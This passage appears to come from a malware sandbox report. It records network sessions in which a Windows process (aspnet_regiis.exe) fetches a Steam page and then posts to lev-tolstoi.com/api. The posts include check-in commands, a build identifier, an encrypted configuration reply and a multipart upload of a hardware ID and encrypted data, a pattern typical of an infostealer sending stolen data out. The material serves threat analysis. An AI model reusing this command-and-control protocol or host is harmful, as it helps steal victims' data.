                                                                                                                                                                                                                                          2024-12-18 13:46:41 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                          Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                          2024-12-18 13:46:41 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                          Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          1192.168.2.449732172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:46:42 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:46:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-12-18 13:46:44 UTC1037INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:46:44 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=p6do4oorpi04d2t45vot9tbjj6; expires=Sun, 13-Apr-2025 07:33:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDlxVe2U2lDvrNfeUVxiSGiHPHfQ1nK5ZxvwvZ%2Bjn1ZqlFL4hD1s%2Fi89Tfcqj0xEMbYf987wef4532iJu09E%2F1%2Fw7aJeF552PF8tP14oCeLuNmjzkjkRlBE56bgtZxz9wYE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f99c2bfde4273-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1699&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1718658&cwnd=229&unsent_bytes=0&cid=7638af197a087862&ts=2339&x=0"
                                                                                                                                                                                                                                          2024-12-18 13:46:44 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                          2024-12-18 13:46:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          2192.168.2.449733172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:46:46 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 54
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:46:46 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76 69 74 79 7a 63 71 71 26 6a 3d
                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--uzkmvityzcqq&j=
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1035INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:46:53 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=66cok6t5ln6p250s4b3genbcpq; expires=Sun, 13-Apr-2025 07:33:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2BDwOnfNdQxjvHW8bNUi0p6eVIogigIkNwLrJPAnlqP1bZUa5r4tFcbikLd2ykZ2nH13fuyzIR1Jkq3tqt6UjbnNDvJEw51W%2BY31LUvuZUkwVbk5VsdrroahOyqBCpGXvDY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f99d8da06422e-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2387&min_rtt=2377&rtt_var=912&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=953&delivery_rate=1186509&cwnd=252&unsent_bytes=0&cid=5b1fc0fa0738cd70&ts=7187&x=0"
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC334INData Raw: 34 65 32 0d 0a 67 6d 2f 46 4d 71 44 58 62 49 78 51 74 32 36 55 4b 47 30 75 67 49 69 6e 71 4a 6e 4c 71 34 31 33 65 55 44 6c 79 4b 47 6e 76 6a 58 35 54 62 4d 51 6d 75 4e 41 72 69 50 53 54 4b 35 63 48 31 76 6c 70 49 58 4a 2f 65 6d 52 36 78 59 56 4d 34 44 6b 67 39 48 54 46 37 67 4a 70 46 37 54 73 6b 43 75 4e 63 39 4d 72 6e 4d 57 44 4f 58 6d 68 5a 4b 37 72 73 48 76 46 68 55 69 68 4b 50 4f 31 39 4a 57 36 67 4f 69 57 73 57 30 43 4f 30 38 32 67 76 78 54 51 78 45 37 75 48 4b 77 50 54 70 68 36 38 53 41 32 4c 66 36 75 7a 43 79 6c 54 50 44 72 5a 5a 67 71 70 41 39 33 4c 53 41 4c 59 53 54 30 2f 6c 36 73 76 4f 2f 61 44 44 35 52 38 64 49 34 47 69 30 63 37 59 58 65 6f 4e 6f 56 76 50 76 52 7a 67 4e 74 30 41 39 30 63 4d 44 4b 79 71 77 74 4b 37 38 59 6d 38 4a 78 67 7a 6c 72
                                                                                                                                                                                                                                          Data Ascii: 4e2gm/FMqDXbIxQt26UKG0ugIinqJnLq413eUDlyKGnvjX5TbMQmuNAriPSTK5cH1vlpIXJ/emR6xYVM4Dkg9HTF7gJpF7TskCuNc9MrnMWDOXmhZK7rsHvFhUihKPO19JW6gOiWsW0CO082gvxTQxE7uHKwPTph68SA2Lf6uzCylTPDrZZgqpA93LSALYST0/l6svO/aDD5R8dI4Gi0c7YXeoNoVvPvRzgNt0A90cMDKyqwtK78Ym8Jxgzlr
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC923INData Raw: 67 52 62 50 63 6d 7a 67 38 4c 51 46 37 68 4e 6f 56 37 44 75 41 37 38 4f 74 34 48 38 31 67 45 52 65 2f 6e 78 63 66 78 70 73 72 76 45 68 45 6f 69 4b 44 48 79 4e 46 52 34 41 33 6e 48 6f 4b 79 46 71 35 71 6c 53 2f 7a 57 67 68 41 39 4b 6a 2f 69 75 54 6e 30 4b 38 53 46 32 4c 66 36 73 76 41 33 31 54 72 41 71 52 59 79 61 63 4f 2f 44 54 59 43 65 52 4d 43 6b 4c 6f 36 64 66 41 39 61 2f 4b 35 68 34 53 4a 34 43 75 67 34 75 63 55 50 68 4e 2f 78 44 6a 75 41 58 69 4f 4d 49 4d 74 6c 56 42 56 61 4c 74 79 59 71 6a 36 63 33 75 45 52 6f 6d 69 61 54 48 79 64 70 5a 37 51 4b 68 57 73 4b 79 42 4f 59 36 31 41 48 39 52 51 39 4a 37 2b 37 44 78 76 71 73 69 61 46 56 48 44 72 48 38 6f 50 72 32 31 54 79 54 35 4a 54 7a 4c 73 4a 2b 48 4c 4b 51 75 38 4b 43 45 43 69 73 6f 58 45 2f 71 62 62
                                                                                                                                                                                                                                          Data Ascii: gRbPcmzg8LQF7hNoV7DuA78Ot4H81gERe/nxcfxpsrvEhEoiKDHyNFR4A3nHoKyFq5qlS/zWghA9Kj/iuTn0K8SF2Lf6svA31TrAqRYyacO/DTYCeRMCkLo6dfA9a/K5h4SJ4Cug4ucUPhN/xDjuAXiOMIMtlVBVaLtyYqj6c3uERomiaTHydpZ7QKhWsKyBOY61AH9RQ9J7+7DxvqsiaFVHDrH8oPr21TyT5JTzLsJ+HLKQu8KCECisoXE/qbb
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 34 34 33 61 0d 0a 30 45 39 6b 63 4f 52 2b 72 73 79 4d 48 30 70 73 37 6e 46 68 63 6e 69 71 6d 44 69 35 78 51 2b 45 33 2f 45 4f 65 37 44 66 38 6a 6c 7a 6e 31 52 41 46 4c 39 4b 72 61 68 4f 4c 70 7a 75 4e 56 51 32 4b 4e 72 63 54 42 30 56 33 6a 43 61 4e 64 7a 62 77 48 35 79 44 66 41 50 68 59 41 6b 62 6e 35 4d 6e 50 39 4b 6e 49 37 68 73 52 4b 63 66 6b 67 38 4c 45 46 37 68 4e 69 46 33 53 70 77 54 6c 49 35 63 35 39 55 51 42 53 2f 53 71 32 6f 54 69 36 63 37 6a 56 55 4e 69 6a 4b 7a 50 79 64 78 52 38 67 4f 6f 51 73 69 6e 43 75 41 32 32 51 4c 2f 52 77 42 4a 38 4f 37 46 32 50 71 73 7a 75 45 59 43 53 66 48 35 49 50 43 78 42 65 34 54 5a 31 6b 78 61 55 66 36 58 44 67 44 2f 68 45 43 46 71 69 39 59 76 54 75 36 37 46 72 30 31 62 49 59 75 6e 79 73 44 54 52 65 6f 42 70 6b 4c
                                                                                                                                                                                                                                          Data Ascii: 443a0E9kcOR+rsyMH0ps7nFhcniqmDi5xQ+E3/EOe7Df8jlzn1RAFL9KrahOLpzuNVQ2KNrcTB0V3jCaNdzbwH5yDfAPhYAkbn5MnP9KnI7hsRKcfkg8LEF7hNiF3SpwTlI5c59UQBS/Sq2oTi6c7jVUNijKzPydxR8gOoQsinCuA22QL/RwBJ8O7F2PqszuEYCSfH5IPCxBe4TZ1kxaUf6XDgD/hECFqi9YvTu67Fr01bIYunysDTReoBpkL
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 44 62 66 43 66 4a 47 42 55 7a 6e 2b 4d 33 4d 2f 4b 58 42 36 68 6f 64 4a 34 71 74 79 4d 62 4f 52 65 4d 4a 71 56 79 43 2b 30 37 70 4b 70 56 55 74 6d 38 59 54 2f 4c 73 78 6f 72 6b 35 39 43 76 45 68 64 69 33 2b 72 44 79 39 42 63 35 77 61 73 56 4d 61 31 41 2b 55 38 32 77 58 36 51 67 4e 4c 38 4f 66 41 77 76 47 67 7a 4f 4d 59 47 44 43 45 71 34 4f 4c 6e 46 44 34 54 66 38 51 35 59 59 35 7a 58 4c 4b 51 75 38 4b 43 45 43 69 73 6f 58 4c 38 36 37 48 36 77 63 56 4d 49 6d 74 77 38 50 55 58 2b 63 42 71 56 37 51 76 51 2f 75 50 4e 6f 45 2f 30 34 4f 53 4f 62 6d 77 6f 71 31 36 63 37 33 56 55 4e 69 72 36 6e 5a 33 35 35 35 36 77 32 67 51 4e 53 75 54 76 46 38 7a 45 7a 78 52 6b 38 55 6f 75 37 4f 77 50 4b 71 77 4f 73 59 47 79 75 49 6f 38 76 49 31 45 58 68 42 37 56 55 78 37 51 42
                                                                                                                                                                                                                                          Data Ascii: DbfCfJGBUzn+M3M/KXB6hodJ4qtyMbOReMJqVyC+07pKpVUtm8YT/Lsxork59CvEhdi3+rDy9Bc5wasVMa1A+U82wX6QgNL8OfAwvGgzOMYGDCEq4OLnFD4Tf8Q5YY5zXLKQu8KCECisoXL867H6wcVMImtw8PUX+cBqV7QvQ/uPNoE/04OSObmwoq16c73VUNir6nZ35556w2gQNSuTvF8zEzxRk8Uou7OwPKqwOsYGyuIo8vI1EXhB7VUx7QB
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 54 37 53 51 64 65 34 75 66 46 32 4f 6d 76 77 75 46 56 56 57 4b 41 73 6f 4f 64 6e 47 62 33 42 75 64 50 6a 4b 78 4f 36 54 36 56 56 4c 5a 4a 42 55 48 73 2b 4d 48 4d 38 4b 72 48 35 78 41 54 4a 6f 32 6e 7a 4d 37 57 58 75 67 4e 71 46 58 4b 76 67 6a 67 4d 39 4d 41 2b 77 70 42 44 4f 58 79 68 5a 4b 37 6a 74 50 69 45 77 77 7a 73 71 33 44 6c 4a 78 49 72 68 54 6e 56 38 37 31 56 71 34 2f 32 51 62 37 54 77 74 45 35 65 6e 45 78 76 2b 6b 78 4f 73 63 48 79 65 56 75 4d 58 4c 33 46 6a 75 41 71 74 43 7a 4c 41 4f 34 6e 4b 62 54 50 46 53 54 78 53 69 32 39 4c 4b 75 37 61 48 39 6c 55 63 4c 73 66 79 67 38 72 52 52 65 77 43 70 31 48 42 73 51 58 70 4e 4e 4d 4e 39 55 38 4d 53 65 54 72 78 63 62 78 72 73 48 6c 47 78 59 6b 67 36 7a 46 68 5a 49 58 35 78 58 6e 43 49 4b 48 41 2b 41 37 31
                                                                                                                                                                                                                                          Data Ascii: T7SQde4ufF2OmvwuFVVWKAsoOdnGb3BudPjKxO6T6VVLZJBUHs+MHM8KrH5xATJo2nzM7WXugNqFXKvgjgM9MA+wpBDOXyhZK7jtPiEwwzsq3DlJxIrhTnV871Vq4/2Qb7TwtE5enExv+kxOscHyeVuMXL3FjuAqtCzLAO4nKbTPFSTxSi29LKu7aH9lUcLsfyg8rRRewCp1HBsQXpNNMN9U8MSeTrxcbxrsHlGxYkg6zFhZIX5xXnCIKHA+A71
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 49 52 4f 33 75 78 63 57 37 35 34 6e 6f 44 56 74 36 78 34 72 49 30 2f 31 5a 36 78 2f 6e 54 34 79 73 54 75 6b 2b 6c 56 53 32 52 41 5a 4e 36 75 54 4a 77 76 2b 37 79 65 51 63 46 43 4f 49 71 73 44 45 31 6c 2f 79 43 36 64 62 79 72 49 47 36 6a 7a 48 44 66 6b 4b 51 51 7a 6c 38 6f 57 53 75 35 6a 66 36 42 49 55 59 4b 36 74 32 4d 54 57 56 4f 73 42 35 30 2b 4d 72 45 37 70 50 70 56 55 74 6b 63 44 51 65 62 34 79 63 72 37 6f 4d 37 6c 42 78 51 74 69 71 6e 44 77 4d 35 57 38 67 4b 73 56 63 47 78 41 65 45 2b 33 51 61 32 42 45 39 4c 2b 71 71 64 69 74 65 71 32 4f 56 58 50 44 69 52 72 63 2f 55 31 31 72 73 54 62 67 65 32 2f 55 4a 34 6e 4b 4e 54 50 5a 4c 41 6c 37 6e 36 38 2f 41 39 71 48 47 36 68 41 55 4a 6f 4f 68 7a 64 66 53 57 4f 41 4c 72 46 48 48 74 67 58 6b 50 4e 77 65 74 67
                                                                                                                                                                                                                                          Data Ascii: IRO3uxcW754noDVt6x4rI0/1Z6x/nT4ysTuk+lVS2RAZN6uTJwv+7yeQcFCOIqsDE1l/yC6dbyrIG6jzHDfkKQQzl8oWSu5jf6BIUYK6t2MTWVOsB50+MrE7pPpVUtkcDQeb4ycr7oM7lBxQtiqnDwM5W8gKsVcGxAeE+3Qa2BE9L+qqditeq2OVXPDiRrc/U11rsTbge2/UJ4nKNTPZLAl7n68/A9qHG6hAUJoOhzdfSWOALrFHHtgXkPNwetg
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 36 63 44 50 38 61 58 46 37 68 30 53 4b 49 4b 76 78 63 2f 66 57 65 38 4d 71 31 54 4c 75 77 65 75 66 4a 55 4c 37 67 70 58 44 4e 54 36 77 74 4c 32 75 59 76 64 46 67 6f 7a 6b 71 66 54 77 35 35 34 34 77 47 6b 56 63 57 6c 54 76 46 38 7a 45 7a 78 52 6b 38 55 6f 75 72 42 78 76 69 75 78 2b 41 59 46 43 57 4d 70 63 6e 4c 7a 6c 6a 6c 42 61 74 59 7a 36 63 45 35 43 44 63 42 66 74 45 42 31 37 68 71 6f 75 4b 2f 4c 47 4a 74 31 55 70 4b 49 53 6d 31 63 6a 54 46 2f 39 44 76 68 44 46 75 55 36 32 63 73 63 65 39 6b 45 50 53 2b 7a 34 78 4d 4c 30 6f 38 6e 70 48 68 45 68 6a 71 37 4e 7a 4e 70 57 37 51 79 6d 55 4d 65 31 42 2f 77 2f 6c 55 4b 32 54 52 63 4d 75 71 72 79 78 76 43 59 79 76 6c 56 42 47 79 65 36 73 54 4a 6e 41 2b 67 44 4c 56 64 79 72 45 4f 34 7a 54 65 44 66 64 4a 44 30 7a
                                                                                                                                                                                                                                          Data Ascii: 6cDP8aXF7h0SKIKvxc/fWe8Mq1TLuweufJUL7gpXDNT6wtL2uYvdFgozkqfTw5544wGkVcWlTvF8zEzxRk8UourBxviux+AYFCWMpcnLzljlBatYz6cE5CDcBftEB17hqouK/LGJt1UpKISm1cjTF/9DvhDFuU62csce9kEPS+z4xML0o8npHhEhjq7NzNpW7QymUMe1B/w/lUK2TRcMuqryxvCYyvlVBGye6sTJnA+gDLVdyrEO4zTeDfdJD0z
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 72 76 75 79 76 30 48 48 53 47 52 71 59 54 37 34 6e 66 72 47 36 5a 64 79 62 6b 77 30 43 66 57 41 76 68 4e 47 56 32 69 70 49 58 46 75 2f 48 77 72 31 31 62 48 63 6e 71 32 34 57 45 46 39 55 4f 71 56 37 46 6f 78 2b 6a 45 74 34 61 39 30 63 45 51 4b 44 72 79 4e 72 38 36 59 65 76 45 31 74 36 31 2b 53 44 77 63 30 58 75 46 33 31 43 35 66 6d 57 62 35 67 79 6b 4c 76 43 68 6b 4d 75 72 69 4c 69 75 6e 70 6b 61 39 53 47 44 43 56 72 4d 44 54 33 78 44 65 4d 34 64 62 7a 72 59 43 37 7a 57 56 51 72 5a 46 54 78 54 62 71 73 62 59 36 65 62 59 2b 52 67 4c 4a 63 75 69 30 73 6a 51 46 36 35 4e 36 31 54 4a 75 51 76 70 49 70 6f 65 35 6b 45 44 57 71 37 75 31 34 71 31 36 64 6a 6b 47 67 6b 73 67 4f 58 53 30 39 46 48 34 77 69 67 48 4d 71 6b 41 2b 4a 79 6d 30 7a 6a 51 51 4e 4b 37 2f 2b 4b
                                                                                                                                                                                                                                          Data Ascii: rvuyv0HHSGRqYT74nfrG6Zdybkw0CfWAvhNGV2ipIXFu/Hwr11bHcnq24WEF9UOqV7Fox+jEt4a90cEQKDryNr86YevE1t61+SDwc0XuF31C5fmWb5gykLvChkMuriLiunpka9SGDCVrMDT3xDeM4dbzrYC7zWVQrZFTxTbqsbY6ebY+RgLJcui0sjQF65N61TJuQvpIpoe5kEDWq7u14q16djkGgksgOXS09FH4wigHMqkA+Jym0zjQQNK7/+K
                                                                                                                                                                                                                                          2024-12-18 13:46:53 UTC1369INData Raw: 58 2b 42 68 55 70 6b 61 32 44 2b 70 49 58 2b 45 33 2f 45 50 65 32 41 4f 41 31 77 78 32 37 62 41 78 4c 35 4f 6e 4c 33 65 72 70 68 36 38 54 57 33 72 56 35 49 50 42 7a 52 65 34 58 66 55 4c 6c 2b 5a 5a 76 6d 44 4b 51 75 38 4b 47 51 79 36 75 59 75 4b 36 65 6d 52 72 31 49 56 4c 34 61 70 7a 63 62 4f 52 65 59 4f 73 56 4f 46 69 7a 44 4c 50 39 67 4a 2b 45 30 78 63 73 50 67 31 63 66 30 72 76 66 52 49 67 6f 6c 6c 2b 6a 6c 78 73 70 55 6f 45 50 6e 53 49 4c 74 54 73 38 34 78 51 48 35 54 55 38 43 6f 75 36 46 6b 72 75 4d 78 4f 49 51 46 53 58 46 69 38 6e 56 30 56 6a 6e 54 65 6b 51 7a 76 56 57 72 6a 50 66 48 50 74 46 43 41 44 6c 38 4d 4b 4b 74 65 6e 48 72 30 31 62 49 34 32 36 7a 73 72 62 47 2b 59 44 71 52 44 64 2b 78 65 75 4a 4a 56 55 70 51 52 50 58 71 4b 79 68 59 33 31 70
                                                                                                                                                                                                                                          Data Ascii: X+BhUpka2D+pIX+E3/EPe2AOA1wx27bAxL5OnL3erph68TW3rV5IPBzRe4XfULl+ZZvmDKQu8KGQy6uYuK6emRr1IVL4apzcbOReYOsVOFizDLP9gJ+E0xcsPg1cf0rvfRIgoll+jlxspUoEPnSILtTs84xQH5TU8Cou6FkruMxOIQFSXFi8nV0VjnTekQzvVWrjPfHPtFCADl8MKKtenHr01bI426zsrbG+YDqRDd+xeuJJVUpQRPXqKyhY31p


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          3192.168.2.449735172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:46:54 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 18170
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:46:54 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76
                                                                                                                                                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
                                                                                                                                                                                                                                          2024-12-18 13:46:54 UTC2839OUTData Raw: 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27
                                                                                                                                                                                                                                          Data Ascii: yA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'
                                                                                                                                                                                                                                          2024-12-18 13:46:59 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:46:58 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=ma64n2hnmaqbnue64ju83scesf; expires=Sun, 13-Apr-2025 07:33:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
